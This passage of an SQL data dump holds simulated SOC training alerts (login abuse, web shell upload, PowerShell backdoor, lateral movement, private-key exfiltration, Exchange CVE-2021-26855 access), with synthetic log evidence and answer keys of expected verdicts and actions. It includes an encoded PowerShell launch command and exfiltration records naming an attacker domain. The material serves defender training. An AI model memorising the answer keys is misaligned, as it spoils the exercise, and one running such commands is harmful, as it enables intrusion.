2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:45:00Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023-1002\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"SensitiveDataArchive.zip\\\",\\\"file_size\\\":\\\"125GB\\\",\\\"hash\\\":\\\"f2ca1bb6c7e907d06dafe4687e579fce\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltrated\\\",\\\"external_server_domain\\\":\\\"maliciousserver.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.752Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:45:00Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023-1002\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"SensitiveDataArchive.zip\\\",\\\"file_size\\\":\\\"125GB\\\",\\\"hash\\\":\\\"f2ca1bb6c7e907d06dafe4687e579fce\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltrated\\\",\\\"external_server_domain\\\":\\\"maliciousserver.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.752Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:45:00Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023-1002\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"SensitiveDataArchive.zip\\\",\\\"file_size\\\":\\\"125GB\\\",\\\"hash\\\":\\\"f2ca1bb6c7e907d06dafe4687e579fce\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltrated\\\",\\\"external_server_domain\\\":\\\"maliciousserver.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1054, 'Unauthorized Login Attempt Detected', 'medium', 'SIEM logs', 'An unauthorized login attempt was detected using credentials associated with an employee. The source of the login attempt is traced back to an IP address not recognized as part of the typical network traffic, indicating potential credential compromise through phishing.', 'Credential Access', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:42:17Z\",\"event_id\":\"4625\",\"logon_type\":\"3\",\"source_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"target_domain\":\"corp.godaddy.com\",\"status\":\"Failed\",\"failure_reason\":\"Account currently disabled\",\"internal_ip\":\"10.10.15.23\",\"log_source\":\"Windows Security Log\",\"event_description\":\"An account failed to log on.\"}', '2026-01-24 00:38:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with multiple unauthorized login attempts globally.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"Employee account used within GoDaddy.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.753Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:42:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"logon_type\\\":\\\"3\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"target_domain\\\":\\\"corp.godaddy.com\\\",\\\"status\\\":\\\"Failed\\\",\\\"failure_reason\\\":\\\"Account currently disabled\\\",\\\"internal_ip\\\":\\\"10.10.15.23\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"event_description\\\":\\\"An account failed to log on.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.753Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:42:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"logon_type\\\":\\\"3\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"target_domain\\\":\\\"corp.godaddy.com\\\",\\\"status\\\":\\\"Failed\\\",\\\"failure_reason\\\":\\\"Account currently disabled\\\",\\\"internal_ip\\\":\\\"10.10.15.23\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"event_description\\\":\\\"An account failed to log on.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.753Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:42:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"logon_type\\\":\\\"3\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"target_domain\\\":\\\"corp.godaddy.com\\\",\\\"status\\\":\\\"Failed\\\",\\\"failure_reason\\\":\\\"Account currently disabled\\\",\\\"internal_ip\\\":\\\"10.10.15.23\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"event_description\\\":\\\"An account failed to log on.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.753Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:42:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"logon_type\\\":\\\"3\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"target_domain\\\":\\\"corp.godaddy.com\\\",\\\"status\\\":\\\"Failed\\\",\\\"failure_reason\\\":\\\"Account currently disabled\\\",\\\"internal_ip\\\":\\\"10.10.15.23\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"event_description\\\":\\\"An account failed to log on.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.753Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:42:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"logon_type\\\":\\\"3\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"target_domain\\\":\\\"corp.godaddy.com\\\",\\\"status\\\":\\\"Failed\\\",\\\"failure_reason\\\":\\\"Account currently disabled\\\",\\\"internal_ip\\\":\\\"10.10.15.23\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"event_description\\\":\\\"An account failed to log on.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1055, 'Suspicious sFTP Activity', 'medium', 'sFTP server logs', 'An attacker has uploaded a malicious script to a WordPress site via sFTP. The script is intended to exploit known vulnerabilities in WordPress installations.', 'Execution', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"sftp_server\":\"sftp.example.com\",\"action\":\"upload\",\"username\":\"compromised_user\",\"client_ip\":\"203.0.113.45\",\"server_ip\":\"192.168.1.10\",\"file_uploaded\":\"malicious_script.php\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"transfer_status\":\"completed\"}', '2026-01-24 00:38:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User account used in suspicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_script.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"malicious\",\"details\":\"File identified as a malicious script targeting WordPress.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware associated with WordPress exploits.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.755Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"sftp_server\\\":\\\"sftp.example.com\\\",\\\"action\\\":\\\"upload\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"server_ip\\\":\\\"192.168.1.10\\\",\\\"file_uploaded\\\":\\\"malicious_script.php\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"transfer_status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.755Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"sftp_server\\\":\\\"sftp.example.com\\\",\\\"action\\\":\\\"upload\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"server_ip\\\":\\\"192.168.1.10\\\",\\\"file_uploaded\\\":\\\"malicious_script.php\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"transfer_status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.755Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"sftp_server\\\":\\\"sftp.example.com\\\",\\\"action\\\":\\\"upload\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"server_ip\\\":\\\"192.168.1.10\\\",\\\"file_uploaded\\\":\\\"malicious_script.php\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"transfer_status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.755Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"sftp_server\\\":\\\"sftp.example.com\\\",\\\"action\\\":\\\"upload\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"server_ip\\\":\\\"192.168.1.10\\\",\\\"file_uploaded\\\":\\\"malicious_script.php\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"transfer_status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.755Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"sftp_server\\\":\\\"sftp.example.com\\\",\\\"action\\\":\\\"upload\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"server_ip\\\":\\\"192.168.1.10\\\",\\\"file_uploaded\\\":\\\"malicious_script.php\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"transfer_status\\\":\\\"completed\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1056, 'Persistent Backdoor Established', 'high', 'Endpoint detection and response (EDR) logs', 'An attacker has installed a persistent backdoor on the compromised system to maintain access. This action is part of a broader campaign to ensure continued access even if initial infections are detected and removed.', 'Persistence', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"hostname\":\"compromised-host\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"203.0.113.45\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -encodedCommand aW1wb3J0LW1vZHVsZSBuZXQuc2VydmljZXM7IFN0YXJ0LVByb2Nlc3MgJ3NjcmlwdC5leGUn\",\"username\":\"compromised_user\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Roaming\\\\backdoor.exe\"}', '2026-01-24 00:38:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with backdoor malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Threat Database\",\"verdict\":\"malicious\",\"details\":\"Backdoor used for persistent access.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Compromised user account used to execute the backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1057, 'Lateral Movement Detected in Network', 'high', 'Network traffic analysis', 'Using the established backdoor, the attacker moves laterally to other systems, targeting more WordPress accounts.', 'Lateral Movement', 'T1071.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.12\",\"user\":\"wp_admin\",\"malware_hash\":\"4d2c6b6ba54ede6b9d5c1d1f1e5b8c7c\",\"filename\":\"wp_backdoor.php\",\"event_type\":\"network_connection\",\"protocol\":\"TCP\",\"destination_port\":22,\"action\":\"connection_attempt\",\"status\":\"success\"}', '2026-01-24 00:38:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known command and control server IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server targeted for lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"4d2c6b6ba54ede6b9d5c1d1f1e5b8c7c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with known PHP web shell\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"wp_backdoor.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Custom PHP script for unauthorized access\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1058, 'SSL Private Key Theft Alert', 'high', 'Data loss prevention (DLP) systems', 'The DLP system detected the unauthorized exfiltration of SSL private keys and other sensitive data. This is a critical step in the attacker\'s operation to exfiltrate sensitive data for future malicious activities or sale on the dark web.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T14:32:00Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"192.168.1.24\",\"destination_ip\":\"203.0.113.45\",\"username\":\"john.doe\",\"action\":\"exfiltration\",\"sensitive_files\":[{\"filename\":\"ssl_private_key.pem\",\"hash\":\"d2f6e0b5e8a3c1f1d9f2c9b8e4a7f5d2\"},{\"filename\":\"confidential_data.zip\",\"hash\":\"b9d3f8e6c7a1b0c4e3d5f9e8b1a7c3d9\"}],\"exfiltration_method\":\"encrypted_channel\",\"alert_triggered\":true}', '2026-01-24 00:38:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.24\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network_scan\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known C2 server used for data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d2f6e0b5e8a3c1f1d9f2c9b8e4a7f5d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation\",\"verdict\":\"suspicious\",\"details\":\"Hash of the exfiltrated SSL private key file.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b9d3f8e6c7a1b0c4e3d5f9e8b1a7c3d9\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation\",\"verdict\":\"suspicious\",\"details\":\"Hash of the exfiltrated confidential data archive.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ssl_private_key.pem\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation\",\"verdict\":\"suspicious\",\"details\":\"Name of the exfiltrated SSL private key file.\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation\",\"verdict\":\"suspicious\",\"details\":\"Name of the exfiltrated confidential data archive.\"}},{\"id\":\"artifact_7\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_database\",\"verdict\":\"internal\",\"details\":\"Internal user account involved in the incident.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.757Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.24\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"john.doe\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"sensitive_files\\\":[{\\\"filename\\\":\\\"ssl_private_key.pem\\\",\\\"hash\\\":\\\"d2f6e0b5e8a3c1f1d9f2c9b8e4a7f5d2\\\"},{\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"b9d3f8e6c7a1b0c4e3d5f9e8b1a7c3d9\\\"}],\\\"exfiltration_method\\\":\\\"encrypted_channel\\\",\\\"alert_triggered\\\":true}\"},{\"timestamp\":\"2026-02-01T20:31:22.757Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.24\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"john.doe\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"sensitive_files\\\":[{\\\"filename\\\":\\\"ssl_private_key.pem\\\",\\\"hash\\\":\\\"d2f6e0b5e8a3c1f1d9f2c9b8e4a7f5d2\\\"},{\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"b9d3f8e6c7a1b0c4e3d5f9e8b1a7c3d9\\\"}],\\\"exfiltration_method\\\":\\\"encrypted_channel\\\",\\\"alert_triggered\\\":true}\"},{\"timestamp\":\"2026-02-01T20:30:22.757Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.24\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"john.doe\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"sensitive_files\\\":[{\\\"filename\\\":\\\"ssl_private_key.pem\\\",\\\"hash\\\":\\\"d2f6e0b5e8a3c1f1d9f2c9b8e4a7f5d2\\\"},{\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"b9d3f8e6c7a1b0c4e3d5f9e8b1a7c3d9\\\"}],\\\"exfiltration_method\\\":\\\"encrypted_channel\\\",\\\"alert_triggered\\\":true}\"},{\"timestamp\":\"2026-02-01T20:29:22.757Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.24\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"john.doe\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"sensitive_files\\\":[{\\\"filename\\\":\\\"ssl_private_key.pem\\\",\\\"hash\\\":\\\"d2f6e0b5e8a3c1f1d9f2c9b8e4a7f5d2\\\"},{\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"b9d3f8e6c7a1b0c4e3d5f9e8b1a7c3d9\\\"}],\\\"exfiltration_method\\\":\\\"encrypted_channel\\\",\\\"alert_triggered\\\":true}\"},{\"timestamp\":\"2026-02-01T20:28:22.757Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.24\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"john.doe\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"sensitive_files\\\":[{\\\"filename\\\":\\\"ssl_private_key.pem\\\",\\\"hash\\\":\\\"d2f6e0b5e8a3c1f1d9f2c9b8e4a7f5d2\\\"},{\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"b9d3f8e6c7a1b0c4e3d5f9e8b1a7c3d9\\\"}],\\\"exfiltration_method\\\":\\\"encrypted_channel\\\",\\\"alert_triggered\\\":true}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1059, 'Suspicious Access via CVE-2021-26855', 'high', 'Network traffic logs', 'An unauthorized access attempt was detected on the Exchange server. The attacker exploited CVE-2021-26855, an SSRF vulnerability, to impersonate the Exchange server and bypass authentication.', 'Initial Access', 'T1190', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:23:55Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"destination_port\":443,\"exploit\":\"CVE-2021-26855\",\"username\":\"exchange_admin\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\",\"http_method\":\"POST\",\"request_uri\":\"/owa/auth/x.js\",\"response_code\":200,\"malicious_payload_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-24 03:32:45', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal Exchange server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"exchange_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Anomalous activity detected using this 